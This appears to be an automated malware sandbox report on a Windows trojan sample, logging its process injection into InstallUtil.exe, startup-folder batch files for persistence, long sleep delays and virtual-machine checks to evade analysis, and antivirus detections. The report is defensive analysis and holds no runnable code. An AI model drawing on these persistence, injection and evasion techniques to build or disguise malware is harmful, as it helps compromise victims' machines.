                      Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\pltF0lsLekfh4Kak6kjaROUd.bat" "
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\0aZULhs3yjKzrM4jdcsdY0pG.bat" "
                      Source: C:\Windows\System32\cmd.exe | Process created: C:\Windows\System32\conhost.exe C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                      Source: unknown | Process created: C:\Windows\System32\cmd.exe C:\Windows\system32\cmd.exe /c ""C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bPdKjWiyihutETqOInbK2Mh7.bat" "
                      Source: C:\Users\user\Desktop\file.exe | Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: mscoree.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: version.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: wldp.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: profapi.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptsp.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: amsi.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: userenv.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: msasn1.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: gpapi.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: dwrite.dll
                      Source: C:\Users\user\Desktop\file.exe | Section loaded: windowscodecs.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mscoree.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: kernel.appcore.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: version.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: vcruntime140_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ucrtbase_clr0400.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: windows.storage.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wldp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: profapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptsp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rsaenh.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: cryptbase.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasapi32.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasman.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rtutils.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mswsock.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winhttp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: iphlpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc6.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dhcpcsvc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: dnsapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: winnsi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: rasadhlp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: fwpuclnt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: secur32.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: sspicli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: schannel.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: mskeyprotect.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ntasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ncrypt.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: ncryptsslp.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: msasn1.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: gpapi.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: uxtheme.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: propsys.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: edputil.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: urlmon.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: iertutil.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: srvcli.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: netutils.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: windows.staterepositoryps.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: wintypes.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: appresolver.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: bcp47langs.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: slc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: userenv.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: sppc.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: onecorecommonproxystub.dll
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe | Section loaded: onecoreuapcommonproxystub.dll
                      Source: C:\Windows\System32\cmd.exe | Section loaded: cmdext.dll
                      Source: C:\Users\user\Desktop\file.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{0EE7644B-1BAD-48B1-9889-0281C206EB85}\InprocServer32
                      Source: Window Recorder | Window detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\file.exe | File opened: C:\Windows\Microsoft.NET\Framework\v4.0.30319\mscorrc.dll
                      Source: file.exe | Static PE information: data directory type: IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR
                      Source: file.exe | Static PE information: Virtual size of .text is bigger than: 0x100000
                      Source: file.exe | Static file information: File size 9643376 > 1048576
                      Source: file.exe | Static PE information: Raw size of .text is bigger than: 0x100000 < 0x91a600
                      Source: file.exe | Static PE information: HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE

                      Data Obfuscation

                      Source: Yara match | File source: 0.2.file.exe.3e60010.4.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.file.exe.3eb0030.3.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.file.exe.3eb0030.3.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.file.exe.51c0000.5.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.file.exe.51c0000.5.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.file.exe.3e60010.4.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 0.2.file.exe.3e37ff0.2.raw.unpack, type: UNPACKEDPE
                      Source: Yara match | File source: 00000000.00000002.2640143868.0000000003F50000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.2640143868.0000000003DFB000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.2641880996.00000000051C0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: 00000000.00000002.2630838739.0000000002D01000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
                      Source: Yara match | File source: Process Memory Space: file.exe PID: 1060, type: MEMORYSTR
                      Source: file.exe, Ao8a0Y.cs | .Net Code: d0L4Gb System.Reflection.Assembly.Load(byte[])
                      Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07221747 push ebp; iretd 0_2_07221748
                      Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0731A6E8 pushad ; ret 0_2_0731AC43
                      Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_0731ABE5 pushad ; ret 0_2_0731AC43
                      Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07310DCE push FFFFFFE9h; retn 0001h 0_2_07310DD0
                      Source: C:\Users\user\Desktop\file.exe | Code function: 0_2_07310ECD push FFFFFFE9h; ret 0_2_07310ECF
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0732CBA0 push esi; ret 0_2_0732CBB1
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0732CBCE push esi; ret 0_2_0732CBB1

                      Boot Survival

                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7dCpczI2KMQNpAzS7xasjkw.batJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q266LY31DJuBkUgU7rnVY9MU.batJump to dropped file
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Q266LY31DJuBkUgU7rnVY9MU.batJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\N7dCpczI2KMQNpAzS7xasjkw.batJump to behavior

                      Hooking and other Techniques for Hiding and Protection

                      Source: C:\Users\user\Desktop\file.exeFile opened: C:\Users\user\Desktop\file.exe\:Zone.Identifier read attributes | deleteJump to behavior
                      Source: C:\Users\user\Desktop\file.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeProcess information set: NOOPENFILEERRORBOXJump to behavior
                      Source: C:\Windows\System32\cmd.exeProcess information set: NOOPENFILEERRORBOXJump to behavior

                      Malware Analysis System Evasion

                      Source: Yara matchFile source: Process Memory Space: file.exe PID: 1060, type: MEMORYSTR
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: D20000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 2D00000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: D50000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 7FC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 8FC0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: 9190000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: A190000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: A520000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: B520000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeMemory allocated: C520000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 1840000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 31B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeMemory allocated: 51B0000 memory reserve | memory write watchJump to behavior
                      Source: C:\Users\user\Desktop\file.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 922337203685477Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 600000Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599875Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599766Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599656Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599543Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599437Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599327Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599187Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 599077Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598958Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598813Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598685Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598578Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598469Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598359Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598250Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598140Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 598031Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597922Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597812Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597703Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597594Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597469Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597359Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597250Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597141Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 597031Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596922Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596809Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596703Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596594Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596482Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596372Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596265Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596156Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 596047Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595938Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595828Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595719Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595609Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595499Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595390Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595281Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595172Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 595062Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594953Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594844Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594734Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594625Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594516Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeThread delayed: delay time: 594391Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 2225Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exeWindow / User API: threadDelayed 7571Jump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 2788Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 1320Thread sleep time: -57000s >= -30000sJump to behavior
                      Source: C:\Users\user\Desktop\file.exe TID: 5936Thread sleep time: -922337203685477s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep count: 39 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -35971150943733603s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -600000s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -599875s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6648Thread sleep count: 2225 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6648Thread sleep count: 7571 > 30Jump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -599766s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -599656s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -599543s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -599437s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -599327s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -599187s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -599077s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -598958s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -598813s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -598685s >= -30000sJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe TID: 6644Thread sleep time: -598578s >= -30000sJump to behavior
                      Source: C:\Windows\System32\conhost.exe Last function: Thread delayed
                      Source: C:\Users\user\Desktop\file.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Thread delayed: delay time: 922337203685477
                      Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\
                      Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\Windows\
                      Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\
                      Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\
                      Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\Roaming\Microsoft\
                      Source: C:\Windows\System32\cmd.exe File opened: C:\Users\user\AppData\
                      Source: file.exe, 00000000.00000002.2640143868.0000000003F50000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2640143868.0000000003DFB000.00000004.00000800.00020000.00000000.sdmp, file.exe, 00000000.00000002.2641880996.00000000051C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: VBoxTray
                      Source: file.exe, 00000000.00000002.2641880996.00000000051C0000.00000004.08000000.00040000.00000000.sdmp Binary or memory string: sandboxierpcssGSOFTWARE\VMware, Inc.\VMware VGAuth
                      Source: InstallUtil.exe, 00000003.00000002.3535818905.0000000001407000.00000004.00000020.00020000.00000000.sdmp Binary or memory string: Hyper-V RAW%SystemRoot%\system32\mswsock.dll
                      Source: C:\Users\user\Desktop\file.exe Process information queried: ProcessInformation
                      Source: C:\Users\user\Desktop\file.exe Process token adjusted: Debug
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Process token adjusted: Debug
                      Source: C:\Users\user\Desktop\file.exe Memory allocated: page read and write | page guard

                      HIPS / PFW / Operating System Protection Evasion

                      Source: C:\Users\user\Desktop\file.exe Memory allocated: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 protect: page execute and read and write
                      Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000 value starts with: 4D5A
                      Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 400000
                      Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 402000
                      Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 404000
                      Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 406000
                      Source: C:\Users\user\Desktop\file.exe Memory written: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe base: 1190008
                      Source: C:\Users\user\Desktop\file.exe Process created: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe "C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe"
                      Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Users\user\Desktop\file.exe VolumeInformation
                      Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Windows.Forms\v4.0_4.0.0.0__b77a5c561934e089\System.Windows.Forms.dll VolumeInformation
                      Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\System.Drawing\v4.0_4.0.0.0__b03f5f7f11d50a3a\System.Drawing.dll VolumeInformation
                      Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.VisualBasic\v4.0_10.0.0.0__b03f5f7f11d50a3a\Microsoft.VisualBasic.dll VolumeInformation
                      Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Accessibility\v4.0_4.0.0.0__b03f5f7f11d50a3a\Accessibility.dll VolumeInformation
                      Source: C:\Users\user\Desktop\file.exe Queries volume information: C:\Windows\Fonts\micross.ttf VolumeInformation
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe Queries volume information: C:\Windows\Microsoft.NET\Framework\v4.0.30319\InstallUtil.exe VolumeInformation
                      Source: C:\Users\user\Desktop\file.exe Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuid
                      Source: Amcache.hve.3.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23080.2006-0\msmpeng.exe
                      Source: Amcache.hve.3.dr Binary or memory string: msmpeng.exe
                      Source: Amcache.hve.3.dr Binary or memory string: c:\program files\windows defender\msmpeng.exe
                      Source: Amcache.hve.3.dr Binary or memory string: c:\programdata\microsoft\windows defender\platform\4.18.23090.2008-0\msmpeng.exe
                      Source: Amcache.hve.3.dr Binary or memory string: MsMpEng.exe
                      [MITRE ATT&CK matrix. Columns: Reconnaissance, Resource Development, Initial Access, Execution, Persistence, Privilege Escalation, Defense Evasion, Credential Access, Discovery, Lateral Movement, Collection, Command and Control, Exfiltration, Impact]
                      [Behavior graph. ID: 1490825, Sample: file.exe, Startdate: 09/08/2024, Architecture: WINDOWS, Score: 100]

                      Source | Detection | Scanner | Label | Link
                      file.exe | 29% | ReversingLabs | Win32.Trojan.InjectorX |
                      file.exe | 100% | Avira | HEUR/AGEN.1304599 |
                      file.exe | 100% | Joe Sandbox ML | |
                      No Antivirus matches
                      Source | Detection | Scanner | Label | Link
